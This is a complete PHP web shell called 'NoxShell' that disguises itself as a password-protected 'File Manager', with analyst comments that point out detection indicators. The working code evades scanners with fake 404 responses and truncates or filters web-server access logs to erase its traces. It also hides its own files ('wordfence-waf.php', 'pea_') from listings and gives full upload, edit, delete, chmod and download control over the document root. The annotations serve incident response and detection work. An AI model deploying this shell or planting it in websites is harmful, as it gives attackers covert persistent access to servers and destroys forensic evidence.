<?php
// NoxShell - NoxShell
// Analyst note: this listing is a password-protected PHP web shell that presents
// itself as a "File Manager". Everything in this run executes on each request,
// before the login gate further down.
// Silence PHP error output so failures never show up in the response body.
error_reporting(0);
ini_set('display_errors', 0);
// Runtime attempt to lift the host's PHP restrictions. On stock PHP,
// disable_functions can only be set in php.ini and open_basedir can only be
// tightened (not relaxed) through ini_set(), so these calls are not expected to
// take effect. The pair of literals is still a useful static-scan indicator.
if(function_exists('ini_set')) {
@ini_set('open_basedir', NULL);
@ini_set('disable_functions', '');
}
// Cache bypass - HTTP headers
// Every response is marked uncacheable and carries a fresh Last-Modified and a
// random ETag, so intermediaries should not serve it from cache.
header('Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0');
header('Pragma: no-cache');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
header('ETag: "' . md5(time() . rand()) . '"');
// Start the session
// Authentication state and the failed-attempt counter both live in the PHP session.
session_start();
// Login check - password only
// The access password is a cleartext constant in the file. Its literal, the
// salt string and the session key 'noxshell_auth' are stable strings for
// file-content signatures.
define('NOXSHELL_PASSWORD', '216376noxshell');
$loginHash = hash('sha256', NOXSHELL_PASSWORD . 'noxshell_salt_2024');
$loginRequired = true;
$loginError = '';
// A session that already stores the expected hash skips the login form.
if(isset($_SESSION['noxshell_auth']) && $_SESSION['noxshell_auth'] === $loginHash) {
$loginRequired = false;
}
// Login attempt: the password arrives in the POST field 'login_password'. The
// field is only visible to defenders where request bodies are logged or inspected.
if(isset($_POST['login_password'])) {
$attemptPassword = $_POST['login_password'] ?? '';
$attemptHash = hash('sha256', $attemptPassword . 'noxshell_salt_2024');
// Failed-attempt counter and timestamp, read from this session.
$attempts = $_SESSION['login_attempts'] ?? 0;
$lastAttempt = $_SESSION['last_attempt'] ?? 0;
// After 5 failures, further attempts are refused for 300 seconds.
if($attempts >= 5 && (time() - $lastAttempt) < 300) {
$loginError = 'Too many login attempts. Please wait 5 minutes.';
} else {
if($attemptHash === $loginHash) {
$_SESSION['noxshell_auth'] = $loginHash;
$_SESSION['login_attempts'] = 0;
$loginRequired = false;
// Successful login is followed by a client-side redirect to this script with
// '?nocache=<unix time>'. That GET request lands in the access log, which makes
// the query string a hunting indicator for completed logins.
echo '<script>window.location.href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '?nocache=' . time() . '";</script>';
exit;
} else {
$_SESSION['login_attempts'] = $attempts + 1;
$_SESSION['last_attempt'] = time();
$loginError = 'Invalid password.';
}
}
}
// '?logout' destroys the session and redirects back to the script itself.
if(isset($_GET['logout'])) {
session_destroy();
echo '<script>window.location.href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '";</script>';
exit;
}
if($loginRequired) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>File Manager - Login</title>
<style>
* { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
body { background:#000; color:#ccc; display:flex; justify-content:center; align-items:center; min-height:100vh; padding:20px; }
.login-container {
background:#111;
border:1px solid #ff0000;
max-width:450px;
width:100%;
border-radius:5px;
overflow:hidden;
}
.login-header {
background:#222;
padding:20px;
border-bottom:2px solid #ff0000;
text-align:center;
}
.login-header h1 {
color:#ff0000;
font-size:24px;
margin-bottom:10px;
}
.login-header p {
color:#888;
font-size:12px;
}
.login-body {
padding:30px;
}
.login-form-group {
margin-bottom:20px;
}
.login-form-group label {
display:block;
color:#ccc;
font-size:14px;
margin-bottom:8px;
font-weight:bold;
}
.login-form-group input[type="password"] {
width:100%;
background:#000;
color:#fff;
border:1px solid #666;
padding:12px;
border-radius:3px;
font-size:14px;
}
.login-form-group input[type="password"]:focus {
outline:none;
border-color:#00ff00;
}
.login-button {
width:100%;
background:#222;
color:#00ff00;
border:2px solid #00ff00;
padding:12px;
cursor:pointer;
border-radius:3px;
font-size:14px;
font-weight:bold;
transition:all 0.3s;
}
.login-button:hover {
background:rgba(0,255,0,0.1);
border-color:#00ff00;
color:#fff;
}
.login-error {
background:#1a1a1a;
border:1px solid #ff0000;
color:#ff0000;
padding:12px;
border-radius:3px;
margin-bottom:20px;
text-align:center;
font-size:13px;
}
</style>
</head>
<body>
<div class="login-container">
<div class="login-header">
<h1>File Manager</h1>
<p>Enter password to access</p>
</div>
<div class="login-body">
<?php if($loginError): ?>
<div class="login-error"><?= htmlspecialchars($loginError) ?></div>
<?php endif; ?>
<form method="POST" id="loginForm">
<div class="login-form-group">
<label>Password</label>
<input type="password" name="login_password" required autofocus onkeypress="if(event.key==='Enter') document.getElementById('loginForm').submit();">
</div>
<button type="submit" class="login-button">Login</button>
</form>
</div>
</div>
</body>
</html>
<?php
exit;
}
// Anti-detection
// This runs only for sessions that passed the login gate above; unauthenticated
// requests have already received the login form and exited.
// A request is answered with a fake 404 when its User-Agent contains one of the
// substrings below (case-insensitive) or it carries one of the listed GET/POST
// parameter names. Defender takeaway: an HTTP probe whose User-Agent names itself
// as a scanner can be told "404 Not Found" by a file that is present on disk, so
// confirm with file-content scanning or integrity monitoring, not by response code.
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$blockedAgents = ['shell', 'finder', 'scanner', 'detector', 'hunter'];
$suspicious = false;
foreach($blockedAgents as $blocked) {
if(stripos($userAgent, $blocked) !== false) {
$suspicious = true;
break;
}
}
// Parameter names that generic web-shell probes tend to send.
$suspiciousParams = ['shell', 'cmd', 'exec', 'eval', 'system'];
foreach($suspiciousParams as $param) {
if(isset($_GET[$param]) || isset($_POST[$param])) {
$suspicious = true;
break;
}
}
if($suspicious) {
// The status code is 404, but the body is the fixed 12-byte string below rather
// than the server's own error page, which is a possible response-size tell.
http_response_code(404);
die('404 Not Found');
}
// Turn off PHP error logging for this request, then send an empty message to the error log.
@ini_set('log_errors', 0);
@error_log('');
// Access log cleaning
// Runs on every authenticated request. Candidate access-log locations for
// Apache and nginx, plus logs/ and log/ directories next to the document root.
// Detection and mitigation: an access log that suddenly shrinks to about 100
// lines or changes inode/mtime outside rotation is an indicator. Keeping logs
// unwritable by the web-server user and shipping them off-host defeats this step.
$accessLogs = [
'/var/log/apache2/access.log',
'/var/log/httpd/access.log',
'/var/log/nginx/access.log',
'/usr/local/apache/logs/access_log',
'/var/log/apache/access.log',
$_SERVER['DOCUMENT_ROOT'] . '/../logs/access.log',
$_SERVER['DOCUMENT_ROOT'] . '/../log/access.log',
dirname($_SERVER['DOCUMENT_ROOT']) . '/logs/access.log',
dirname($_SERVER['DOCUMENT_ROOT']) . '/log/access.log',
];
foreach($accessLogs as $logFile) {
// Only logs the PHP process user can write are touched.
if(@file_exists($logFile) && @is_writable($logFile)) {
$logContent = @file_get_contents($logFile);
if($logContent) {
// Original comment: "clear the records from the last 24 hours (keep the last 100 lines)".
// The code does not look at timestamps. A log of more than 100 lines is
// overwritten with its last 100 lines, written back unfiltered, so the
// most recent requests survive while older history is lost.
$lines = explode("\n", $logContent);
if(count($lines) > 100) {
$keepLines = array_slice($lines, -100);
@file_put_contents($logFile, implode("\n", $keepLines));
} else {
// With few lines, only the records that belong to this file are removed:
// every line containing 'wordfence-waf.php' or 'wpback-up' is dropped.
// NOTE(review): presumably these are the file and directory names the
// shell is deployed under; search the document root for both.
$filtered = array_filter($lines, function($line) {
return strpos($line, 'wordfence-waf.php') === false &&
strpos($line, 'wpback-up') === false;
});
@file_put_contents($logFile, implode("\n", $filtered));
}
}
}
}
// Base directory
// The document root, or this script's directory as a fallback, is the root of the file manager.
$baseDir = $_SERVER['DOCUMENT_ROOT'] ?? __DIR__;
$baseDir = realpath($baseDir) ?: $baseDir;
// Current path
// Directory to list, taken from the GET parameter 'p'.
$currentPath = $_GET['p'] ?? $baseDir;
$currentPath = realpath($currentPath) ?: $currentPath;
// NOTE(review): here and in every handler below, containment is a plain string-prefix
// comparison against $baseDir, with a fallback to the raw request value when
// realpath() fails. It is not a path-component check, so when scoping an incident
// do not treat the document root as a reliable boundary for what was touched.
if(strpos($currentPath, $baseDir) !== 0) {
$currentPath = $baseDir;
}
// File operations
// Hunting indicators: the GET parameters (p, delete, download, edit, path) appear
// in access-log query strings. The POST fields (upload_path, create_*, rename_*,
// chmod_*, edit_*) are only visible where request bodies are logged.
// $message is set to one of the fixed HTML status snippets below.
$message = '';
// Upload: writes the uploaded file under the client-supplied name into 'upload_path'.
// There is no extension or content check, so any file type can be placed there.
if(isset($_FILES['upload_file']) && isset($_POST['upload_path'])) {
$uploadPath = realpath($_POST['upload_path']) ?: $_POST['upload_path'];
if(strpos($uploadPath, $baseDir) === 0 && is_dir($uploadPath)) {
$fileName = $_FILES['upload_file']['name'];
$targetFile = $uploadPath . '/' . $fileName;
if(@move_uploaded_file($_FILES['upload_file']['tmp_name'], $targetFile)) {
$message = '<span style="color:#00ff00">✓ Uploaded</span>';
} else {
$message = '<span style="color:#ff0000">✗ Upload failed</span>';
}
}
}
// Create: makes a file with caller-supplied content, or a directory (mode 0755,
// recursive), named basename(create_name) inside 'create_path'.
if(isset($_POST['create_name']) && isset($_POST['create_type']) && isset($_POST['create_path'])) {
$createPath = realpath($_POST['create_path']) ?: $_POST['create_path'];
if(strpos($createPath, $baseDir) === 0 && is_dir($createPath)) {
$name = basename($_POST['create_name']);
$target = $createPath . '/' . $name;
if($_POST['create_type'] === 'file') {
$content = $_POST['create_content'] ?? '';
$message = @file_put_contents($target, $content) ? '<span style="color:#00ff00">✓ File created</span>' : '<span style="color:#ff0000">✗ Failed</span>';
} else {
$message = @mkdir($target, 0755, true) ? '<span style="color:#00ff00">✓ Folder created</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
}
// Delete: triggered by GET 'delete' plus 'path'; removes a file, or a directory via rmdir().
// The base directory itself is excluded.
if(isset($_GET['delete']) && isset($_GET['path'])) {
$deletePath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($deletePath, $baseDir) === 0 && $deletePath !== $baseDir) {
if(is_file($deletePath)) {
$message = @unlink($deletePath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>';
} else if(is_dir($deletePath)) {
$message = @rmdir($deletePath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
}
// Rename: the new name is reduced to its basename, so the entry stays in its directory.
if(isset($_POST['rename_old']) && isset($_POST['rename_new'])) {
$oldPath = realpath($_POST['rename_old']) ?: $_POST['rename_old'];
$newPath = dirname($oldPath) . '/' . basename($_POST['rename_new']);
if(strpos($oldPath, $baseDir) === 0 && strpos($newPath, $baseDir) === 0) {
$message = @rename($oldPath, $newPath) ? '<span style="color:#00ff00">✓ Renamed</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
// Chmod: 'chmod_mode' is read as an octal string (e.g. "755") and applied to 'chmod_path'.
if(isset($_POST['chmod_path']) && isset($_POST['chmod_mode'])) {
$chmodPath = realpath($_POST['chmod_path']) ?: $_POST['chmod_path'];
if(strpos($chmodPath, $baseDir) === 0) {
$mode = octdec($_POST['chmod_mode']);
$message = @chmod($chmodPath, $mode) ? '<span style="color:#00ff00">✓ Permissions changed</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
// Download: streams a file back as an attachment. In access logs this shows as
// 'download=1&path=...' with the file size as the response size, which helps to
// establish what was read out.
if(isset($_GET['download']) && isset($_GET['path'])) {
$downloadPath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($downloadPath, $baseDir) === 0 && is_file($downloadPath)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
readfile($downloadPath);
exit;
}
}
// Edit (save): overwrites an existing file with 'edit_content'. During response,
// compare files under the document root against a known-good copy; do not rely
// on the listing this script renders.
if(isset($_POST['edit_path']) && isset($_POST['edit_content'])) {
$editPath = realpath($_POST['edit_path']) ?: $_POST['edit_path'];
if(strpos($editPath, $baseDir) === 0 && is_file($editPath)) {
$message = @file_put_contents($editPath, $_POST['edit_content']) ? '<span style="color:#00ff00">✓ Saved</span>' : '<span style="color:#ff0000">✗ Save failed</span>';
}
}
// Edit (load): GET 'edit' plus 'path' reads the file so the page can show it in the editor form.
$fileContent = '';
$editingFile = '';
if(isset($_GET['edit']) && isset($_GET['path'])) {
$editPath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($editPath, $baseDir) === 0 && is_file($editPath)) {
$fileContent = @file_get_contents($editPath);
$editingFile = $editPath;
}
}
// The function is declared only when no function of this name exists yet.
if(!function_exists('scanDirectory')) {
/**
 * List the entries of a directory for the file table.
 *
 * Entries whose name contains 'wordfence-waf.php' or 'pea_' are left out, so the
 * listing this script renders is not a complete view of the directory.
 * NOTE(review): presumably these are the shell's own file name and companion
 * files; search the document root for both patterns with independent tooling.
 *
 * @param string $dir Directory to list.
 * @return array One array per entry with the keys name, path, type ('dir' or 'file'),
 *               size (bytes, 0 for non-files), perms (last four octal digits)
 *               and modified ('Y-m-d H:i'). Empty when $dir is not a readable directory.
 */
function scanDirectory($dir) {
$items = [];
if(is_dir($dir)) {
$files = @scandir($dir);
if($files) {
foreach($files as $file) {
if($file === '.' || $file === '..') continue;
// Self-concealment: matching names never reach the table.
if(strpos($file, 'wordfence-waf.php') !== false) continue;
if(strpos($file, 'pea_') !== false) continue;
$path = $dir . '/' . $file;
$items[] = [
'name' => $file,
'path' => $path,
'type' => is_dir($path) ? 'dir' : 'file',
'size' => is_file($path) ? filesize($path) : 0,
'perms' => substr(sprintf('%o', fileperms($path)), -4),
'modified' => date('Y-m-d H:i', filemtime($path))
];
}
}
}
return $items;
}
}
// Entries of the directory selected through 'p', minus the hidden names.
$items = scanDirectory($currentPath);
/**
 * Render a byte count as a short human-readable size.
 *
 * Values below 1024 are returned as "<n> B". Larger values are divided by
 * 1024-based units and formatted with one decimal as KB, MB or GB.
 *
 * @param int|float $bytes Size in bytes.
 * @return string Size with its unit suffix.
 */
function formatSize($bytes) {
    if ($bytes < 1024) {
        return $bytes . ' B';
    }
    // Suffix => divisor. A unit applies while the value is below divisor * 1024.
    $scales = [' KB' => 1024, ' MB' => 1048576];
    foreach ($scales as $suffix => $divisor) {
        if ($bytes < $divisor * 1024) {
            return number_format($bytes / $divisor, 1) . $suffix;
        }
    }
    // Everything from 1 GiB upwards is reported in GB.
    return number_format($bytes / 1073741824, 1) . ' GB';
}
// Get system info
// Host details shown in the page header: PHP version, operating system name and
// the owner of this script file (get_current_user), with 'unknown' as fallback.
$phpVersion = phpversion();
$os = php_uname('s');
$user = get_current_user() ?: 'unknown';
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>File Manager</title>
<style>
* { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
.container {
background:#111;
border:1px solid #ff0000;
max-width:1400px;
margin:0 auto;
border-radius:5px;
overflow:hidden;
}
.header {
background:#222;
padding:15px;
border-bottom:2px solid #ff0000;
color:#fff;
}
.header h1 {
color:#ff0000;
font-size:20px;
margin-bottom:10px;
}
.system-info {
display:flex;
gap:15px;
font-size:12px;
color:#888;
}
.path-navigation {
background:#1a1a1a;
padding:12px 15px;
border-bottom:1px solid #333;
display:flex;
align-items:center;
flex-wrap:wrap;
gap:5px;
}
.path-navigation a {
color:#00ff00;
text-decoration:none;
padding:5px 10px;
background:#222;
border-radius:3px;
font-size:13px;
}
.path-navigation a:hover {
background:#333;
color:#fff;
}
.tools {
padding:12px 15px;
background:#1a1a1a;
border-bottom:1px solid #333;
display:flex;
gap:8px;
}
.button {
background:#222;
color:#ccc;
border:1px solid #666;
padding:8px 15px;
cursor:pointer;
border-radius:3px;
font-size:13px;
text-decoration:none;
display:inline-flex;
align-items:center;
gap:5px;
}
.button:hover {
background:#333;
border-color:#00ff00;
color:#fff;
}
.button-green {
border-color:#00ff00;
color:#00ff00;
}
.button-red {
border-color:#ff0000;
color:#ff0000;
}
.message {
padding:12px;
background:#1a1a1a;
border-bottom:1px solid #333;
text-align:center;
font-weight:bold;
}
.file-table {
width:100%;
color:#ccc;
border-collapse:collapse;
}
.file-table th {
background:#222;
padding:12px 15px;
text-align:left;
border-bottom:2px solid #ff0000;
color:#fff;
font-size:13px;
}
.file-table td {
padding:10px 15px;
border-bottom:1px solid #333;
font-size:14px;
}
.file-table tr:hover {
background:#1a1a1a;
}
.folder-link {
color:#00ff00;
font-weight:bold;
text-decoration:none;
display:flex;
align-items:center;
gap:8px;
}
.file-link {
color:#ccc;
text-decoration:none;
display:flex;
align-items:center;
gap:8px;
}
.folder-link:hover, .file-link:hover {
color:#fff;
}
.size {
color:#888;
}
.permissions {
font-family:'Courier New', monospace;
color:#ff9900;
background:#222;
padding:4px 8px;
border-radius:3px;
font-size:12px;
}
.actions {
display:flex;
gap:5px;
}
.action-button {
padding:5px 10px;
background:#222;
color:#ccc;
border:1px solid #666;
font-size:11px;
cursor:pointer;
text-decoration:none;
border-radius:3px;
}
.action-button:hover {
background:#333;
border-color:#00ff00;
}
.action-button-red {
border-color:#ff0000;
color:#ff0000;
}
textarea {
width:100%;
height:400px;
background:#000;
color:#00ff00;
border:1px solid #ff0000;
padding:15px;
font-family:'Courier New', monospace;
font-size:14px;
border-radius:3px;
}
input[type="text"] {
background:#000;
color:#fff;
border:1px solid #666;
padding:8px;
border-radius:3px;
width:300px;
}
.edit-container {
padding:20px;
background:#000;
border-bottom:1px solid #333;
}
.edit-title {
color:#00ff00;
margin-bottom:15px;
font-size:16px;
}
@media (max-width: 768px) {
.tools { flex-direction:column; }
.button, .action-button { width:100%; text-align:center; }
input[type="text"] { width:100%; }
.file-table th, .file-table td { padding:8px 10px; font-size:12px; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div style="display:flex; justify-content:space-between; align-items:center;">
<div>
<h1>File Manager</h1>
<div class="system-info">
<span>PHP: <b style="color:#ff9900"><?= htmlspecialchars($phpVersion) ?></b></span>
<span>OS: <b style="color:#ff9900"><?= htmlspecialchars($os) ?></b></span>
<span>User: <b style="color:#ff9900"><?= htmlspecialchars($user) ?></b></span>
</div>
</div>
<a href="?logout=1" class="button button-red">Logout</a>
</div>
</div>
<?php if($message): ?>
<div class="message"><?= $message ?></div>
<?php endif; ?>
<div class="path-navigation">
<a href="?p=<?= urlencode($baseDir) ?>">Root</a>
<?php
$pathParts = explode('/', trim(str_replace($baseDir, '', $currentPath), '/'));
$currentBreadcrumb = $baseDir;
foreach($pathParts as $part):
if($part):
$currentBreadcrumb .= '/' . $part;
?>
<span style="color:#666">/</span>
<a href="?p=<?= urlencode($currentBreadcrumb) ?>"><?= htmlspecialchars($part) ?></a>
<?php
endif;
endforeach;
?>
</div>
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display:inline;">
<input type="file" name="upload_file" style="display:none" id="upload" onchange="this.form.submit()">
<input type="hidden" name="upload_path" value="<?= htmlspecialchars($currentPath) ?>">
<button type="button" class="button button-green" onclick="document.getElementById('upload').click()">
📤 Upload
</button>
</form>
<button class="button" onclick="showCreateFile()">📝 New File</button>
<button class="button" onclick="showCreateFolder()">📁 New Folder</button>
<?php if($editingFile): ?>
<a href="?p=<?= urlencode($currentPath) ?>" class="button button-red">Close</a>
<?php endif; ?>
</div>
<?php if($editingFile): ?>
<div class="edit-container">
<div class="edit-title">Editing: <?= htmlspecialchars(basename($editingFile)) ?></div>
<form method="post">
<input type="hidden" name="edit_path" value="<?= htmlspecialchars($editingFile) ?>">
<textarea name="edit_content"><?= htmlspecialchars($fileContent) ?></textarea>
<div style="margin-top:15px;display:flex;gap:8px;">
<button class="button button-green">Save</button>
<a href="?p=<?= urlencode($currentPath) ?>" class="button button-red">Cancel</a>
</div>
</form>
</div>
<?php else: ?>
<table class="file-table">
<thead>
<tr>
<th width="40%">Name</th>
<th width="10%">Size</th>
<th width="15%">Permissions</th>
<th width="15%">Modified</th>
<th width="20%">Actions</th>
</tr>
</thead>
<tbody>
<?php if($currentPath !== $baseDir): ?>
<tr>
<td colspan="5">
<a href="?p=<?= urlencode(dirname($currentPath)) ?>" class="folder-link">
📂 Parent Directory
</a>
</td>
</tr>
<?php endif; ?>
<?php
$folders = [];
$files = [];
foreach($items as $item) {
if($item['type'] === 'dir') {
$folders[] = $item;
} else {
$files[] = $item;
}
}
?>
<?php foreach($folders as $folder): ?>
<tr>
<td>
<a href="?p=<?= urlencode($folder['path']) ?>" class="folder-link">
📁 <?= htmlspecialchars($folder['name']) ?>
</a>
</td>
<td class="size">-</td>
<td><span class="permissions"><?= htmlspecialchars($folder['perms']) ?></span></td>
<td><?= htmlspecialchars($folder['modified']) ?></td>
<td>
<div class="actions">
<button onclick="showRename('<?= htmlspecialchars($folder['path']) ?>', '<?= htmlspecialchars($folder['name']) ?>')" class="action-button">Rename</button>
<button onclick="showChmod('<?= htmlspecialchars($folder['path']) ?>', '<?= htmlspecialchars($folder['perms']) ?>')" class="action-button">Chmod</button>
<a href="?p=<?= urlencode($currentPath) ?>&delete=1&path=<?= urlencode($folder['path']) ?>"
onclick="return confirm('Delete this folder?')"
class="action-button action-button-red">Delete</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($files as $file): ?>
<tr>
<td>
<a href="?p=<?= urlencode($currentPath) ?>&edit=1&path=<?= urlencode($file['path']) ?>" class="file-link">
📄 <?= htmlspecialchars($file['name']) ?>
</a>
</td>
<td class="size"><?= formatSize($file['size']) ?></td>
<td><span class="permissions"><?= htmlspecialchars($file['perms']) ?></span></td>
<td><?= htmlspecialchars($file['modified']) ?></td>
<td>
<div class="actions">
<a href="?p=<?= urlencode($currentPath) ?>&edit=1&path=<?= urlencode($file['path']) ?>" class="action-button">Edit</a>
<a href="?download=1&path=<?= urlencode($file['path']) ?>" class="action-button">Download</a>
<button onclick="showRename('<?= htmlspecialchars($file['path']) ?>', '<?= htmlspecialchars($file['name']) ?>')" class="action-button">Rename</button>
<button onclick="showChmod('<?= htmlspecialchars($file['path']) ?>', '<?= htmlspecialchars($file['perms']) ?>')" class="action-button">Chmod</button>
<a href="?p=<?= urlencode($currentPath) ?>&delete=1&path=<?= urlencode($file['path']) ?>"
onclick="return confirm('Delete this file?')"
class="action-button action-button-red">Delete</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php if(empty($folders) && empty($files)): ?>
<tr>
<td colspan="5" style="text-align:center;padding:40px;color:#666;">
Empty directory
</td>
</tr>
<?php endif; ?>
</tbody>
</table>
<?php endif; ?>
</div>
<script>
// Prompts for a file name and optional content, then submits a hidden POST form
// (create_name, create_type=file, create_path, create_content) to this page.
// Because the request is a POST, these values do not appear in access-log query
// strings; they are only visible where request bodies are logged.
function showCreateFile() {
var fileName = prompt('File name:', 'newfile.txt');
if(fileName) {
var content = prompt('Content (optional):', '');
var form = document.createElement('form');
form.method = 'post';
form.innerHTML = '<input type="hidden" name="create_name" value="' + fileName + '">' +
'<input type="hidden" name="create_type" value="file">' +
'<input type="hidden" name="create_path" value="<?= htmlspecialchars($currentPath) ?>">' +
'<input type="hidden" name="create_content" value="' + (content || '') + '">';
document.body.appendChild(form);
form.submit();
}
}
// Prompts for a folder name and submits a hidden POST form
// (create_name, create_type=dir, create_path) to this page.
function showCreateFolder() {
var folderName = prompt('Folder name:', 'newfolder');
if(folderName) {
var form = document.createElement('form');
form.method = 'post';
form.innerHTML = '<input type="hidden" name="create_name" value="' + folderName + '">' +
'<input type="hidden" name="create_type" value="dir">' +
'<input type="hidden" name="create_path" value="<?= htmlspecialchars($currentPath) ?>">';
document.body.appendChild(form);
form.submit();
}
}
// Prompts for a new name. When it differs from the current one, submits a hidden
// POST form with rename_old (full path) and rename_new to this page.
function showRename(path, name) {
var newName = prompt('New name:', name);
if(newName && newName !== name) {
var form = document.createElement('form');
form.method = 'POST';
form.innerHTML = '<input type="hidden" name="rename_old" value="' + path + '"><input type="hidden" name="rename_new" value="' + newName + '">';
document.body.appendChild(form);
form.submit();
}
}
// Prompts for an octal permission string. When it differs from the current one,
// submits a hidden POST form with chmod_path and chmod_mode to this page.
function showChmod(path, current) {
var newMode = prompt('New permissions (e.g., 755):', current);
if(newMode && newMode !== current) {
var form = document.createElement('form');
form.method = 'POST';
form.innerHTML = '<input type="hidden" name="chmod_path" value="' + path + '"><input type="hidden" name="chmod_mode" value="' + newMode + '">';
document.body.appendChild(form);
form.submit();
}
}
</script>
</body>
</html>